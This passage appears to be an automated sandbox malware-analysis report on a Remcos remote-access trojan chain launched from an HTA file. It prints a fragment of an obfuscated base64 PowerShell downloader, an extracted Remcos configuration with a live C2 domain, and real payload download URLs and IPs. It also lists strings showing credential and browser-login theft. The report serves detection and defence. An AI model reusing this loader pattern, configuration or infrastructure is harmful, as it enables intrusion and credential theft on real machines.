29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6500, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.cmdline", ProcessId: 1848, ProcessName: csc.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Registry Key setAuthor: Joe Security: Data: Details: F5 A3 53 53 9D B0 38 4A 1A F4 EC 2A 3F 9B 2F 71 68 8F 17 D1 D4 54 6E DC A6 CC 9A 91 B5 68 D6 65 BE E0 C7 FD 44 A2 FD 6C 27 38 9E A2 C6 58 9B A6 01 1F 5A B8 A8 09 69 77 1E F9 91 82 1F C9 C7 97 A7 48 B7 EC 86 C6 FD 67 C1 3B 7D 4F 0B 09 90 2F F1 4A 6E 00 27 40 92 D5 31 21 0D 62 08 B3 3F 1D 60 D5 51 7A 81 13 87 DB C2 78 7F 25 12 F5 40 DA AB 45 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B3IX49\exepath
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T07:15:31.827927+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.549742TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T07:15:31.827927+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.549742TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T07:15:34.509348+010020365941Malware Command and Control Activity Detected192.168.2.549753107.173.143.3114646TCP
                      2024-12-16T07:15:36.634309+010020365941Malware Command and Control Activity Detected192.168.2.549759107.173.143.3114646TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T07:15:36.888217+010028033043Unknown Traffic192.168.2.549760178.237.33.5080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T07:15:32.789791+010028582951A Network Trojan was detected104.21.84.67443192.168.2.549742TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T07:15:01.460433+010028587951A Network Trojan was detected192.168.2.549704192.3.122.15980TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-16T07:15:31.417407+010028410751Malware Command and Control Activity Detected192.168.2.549742104.21.84.67443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Source: givenbestupdatedoingformebestthingswithgreatnewsformegive.htaVirustotal: Detection: 27%Perma Link
                      Source: givenbestupdatedoingformebestthingswithgreatnewsformegive.htaReversingLabs: Detection: 13%
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTR
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_0043294A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,11_2_00404423
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_10f41ad8-c

                      Exploits

                      barindex
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00406764 _wcslen,CoGetObject,10_2_00406764

                      Phishing

                      barindex
                      Source: Yara matchFile source: givenbestupdatedoingformebestthingswithgreatnewsformegive.hta, type: SAMPLE
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49742 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2436418544.00000000073E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2437471524.0000000007990000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\brz1t20s\brz1t20s.pdb source: powershell.exe, 00000003.00000002.2160140336.0000000004EC4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2436418544.00000000073E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2437471524.0000000007990000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2437471524.0000000007990000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: system.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotne
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,10_2_0041B43F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0044D5F9 FindFirstFileExA,10_2_0044D5F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,10_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,10_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,10_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00418C79
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,10_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_10006580 FindFirstFileExA,10_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406F06

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.5:49704 -> 192.3.122.159:80
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49753 -> 107.173.143.31:14646
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49759 -> 107.173.143.31:14646
                      Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.5:49742
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.5:49742
                      Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.5:49742
                      Source: Malware configuration extractorURLs: kelexrmcadmnnccupdated.duckdns.org
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: kelexrmcadmnnccupdated.duckdns.org
                      Source: Yara matchFile source: 7.2.powershell.exe.6a06d30.0.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.5:49753 -> 107.173.143.31:14646
                      Source: global trafficHTTP traffic detected: GET /r/qr9V8/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49760 -> 178.237.33.50:80
                      Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49742 -> 104.21.84.67:443
                      Source: global trafficHTTP traffic detected: GET /47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.122.159Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.122.159
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04487A18 URLDownloadToFileW,3_2_04487A18
                      Source: global trafficHTTP traffic detected: GET /r/qr9V8/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.122.159Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: CasPol.exe, 0000000B.00000002.2478926109.00000000019A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: CasPol.exe, 0000000B.00000002.2478926109.00000000019A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: CasPol.exe, CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: CasPol.exe, 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: kelexrmcadmnnccupdated.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: powershell.exe, 00000003.00000002.2164993649.0000000008071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/47/entireti
                      Source: powershell.exe, 00000003.00000002.2163027250.00000000070C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF
                      Source: powershell.exe, 00000003.00000002.2159670974.0000000002B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF;?
                      Source: powershell.exe, 00000003.00000002.2164993649.0000000008071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIFC:
                      Source: powershell.exe, 00000003.00000002.2164993649.0000000008071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.122.159/fault
                      Source: bhvF93F.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhvF93F.tmp.11.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: powershell.exe, 00000003.00000002.2163027250.00000000070C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000007.00000002.2407825131.0000000003487000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microY
                      Source: powershell.exe, 00000007.00000002.2438035679.0000000007A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microl
                      Source: powershell.exe, 00000007.00000002.2437578086.00000000079C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: bhvF93F.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvF93F.tmp.11.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhvF93F.tmp.11.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: CasPol.exe, CasPol.exe, 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.4498075941.0000000000DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
